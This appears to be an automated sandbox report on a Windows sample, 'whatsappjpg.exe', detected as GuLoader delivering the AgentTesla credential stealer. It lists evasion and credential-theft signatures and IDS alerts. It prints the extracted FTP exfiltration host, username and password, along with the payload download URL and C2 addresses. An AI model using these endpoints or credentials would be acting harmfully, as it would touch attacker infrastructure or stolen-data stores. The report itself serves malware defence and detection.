Edit tour

Windows Analysis Report
whatsappjpg.exe

Overview

General Information

Sample name:	whatsappjpg.exe
Analysis ID:	1545931
MD5:	8a3f9583866e402739f7da1541d6038d
SHA1:	928530c1cee879a0c6c284f71a56039004ca4fa9
SHA256:	fb89c14504a9c08ddc006305975b11a20f0595e1f2ad7bd9475ba5c245eda0f6
Tags:	exeuser-lowmal3
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Check if machine is in data center or colocation facility

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

whatsappjpg.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\whatsappjpg.exe" MD5: 8A3F9583866E402739F7DA1541D6038D)

whatsappjpg.exe (PID: 1284 cmdline: "C:\Users\user\Desktop\whatsappjpg.exe" MD5: 8A3F9583866E402739F7DA1541D6038D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://mail.hearing-vision.com", "Username": "code@hearing-vision.com", "Password": "LILKOOLL14!"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: whatsappjpg.exe PID: 1284	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: whatsappjpg.exe PID: 1284	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:36:26.833874+0100	2029927	1	A Network Trojan was detected	192.168.2.9	49976	203.161.184.34	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:36:27.737298+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49977	203.161.184.34	50430	TCP
2024-10-31T10:36:27.742987+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49977	203.161.184.34	50430	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:36:19.109989+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49974	45.43.14.134	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: whatsappjpg.exe.1284.8.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://mail.hearing-vision.com", "Username": "code@hearing-vision.com", "Password": "LILKOOLL14!"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: whatsappjpg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_0040276E FindFirstFileW,	8_2_0040276E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_00405770
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_0040622B FindFirstFileW,FindClose,	8_2_0040622B

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49977 -> 203.161.184.34:50430
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49976 -> 203.161.184.34:21

Source: global traffic

TCP traffic: 192.168.2.9:49977 -> 203.161.184.34:50430

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: JOGJACAMP-AS-IDPTJCIndonesiaID JOGJACAMP-AS-IDPTJCIndonesiaID

Source: unknown

DNS query: name: ip-api.com

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 45.43.14.134:80

Source: unknown

FTP traffic detected: 203.161.184.34:21 -> 192.168.2.9:49976 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic

HTTP traffic detected: GET /disha/mDdzfEwyp125.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: hublore.inCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /disha/mDdzfEwyp125.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: hublore.inCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: hublore.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.hearing-vision.com

Source: whatsappjpg.exe, 00000008.00000002.3824732446.0000000007A30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.bin
Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.binh(
Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.binp(
Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: whatsappjpg.exe, 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.hearing-vision.com
Source: whatsappjpg.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: whatsappjpg.exe, 00000000.00000002.2580955367.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 660.jpg.0.dr, nsc8B5F.tmp.0.dr	String found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

Source: C:\Users\user\Desktop\whatsappjpg.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		8_2_00403358

Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00404B0E	8_2_00404B0E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_0040653D	8_2_0040653D
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00164A88	8_2_00164A88
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00163E70	8_2_00163E70
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_001641B8	8_2_001641B8
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394AC880	8_2_394AC880
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394A8D28	8_2_394A8D28
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394A10D8	8_2_394A10D8
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394AB848	8_2_394AB848
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394AB839	8_2_394AB839
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394AA014	8_2_394AA014
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D65F8	8_2_394D65F8
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D0040	8_2_394D0040
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D8730	8_2_394D8730
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394DE7D0	8_2_394DE7D0
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D9B90	8_2_394D9B90
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D32B8	8_2_394D32B8
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394DAC48	8_2_394DAC48
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D8E7B	8_2_394D8E7B
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D3598	8_2_394D3598
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_394D0012	8_2_394D0012

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: String function: 00402B38 appears 47 times

Source: whatsappjpg.exe, 00000000.00000000.1345391351.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe
Source: whatsappjpg.exe, 00000008.00000000.2575394897.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe
Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs whatsappjpg.exe
Source: whatsappjpg.exe, 00000008.00000002.3844298833.00000000361F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs whatsappjpg.exe
Source: whatsappjpg.exe	Binary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe

Source: whatsappjpg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@3/3

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_0040206A

Source: C:\Users\user\Desktop\whatsappjpg.exe

File created: C:\Users\user\Uploadable

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\whatsappjpg.exe

File created: C:\Users\user\AppData\Local\Temp\nsc8B5E.tmp

Jump to behavior

Source: whatsappjpg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\whatsappjpg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\whatsappjpg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\whatsappjpg.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

File read: C:\Users\user\Desktop\whatsappjpg.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

File written: C:\Users\user\AppData\Local\Temp\Settings.ini

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_10002DB0 push eax; ret

0_2_10002DDE

Source: C:\Users\user\Desktop\whatsappjpg.exe

File created: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
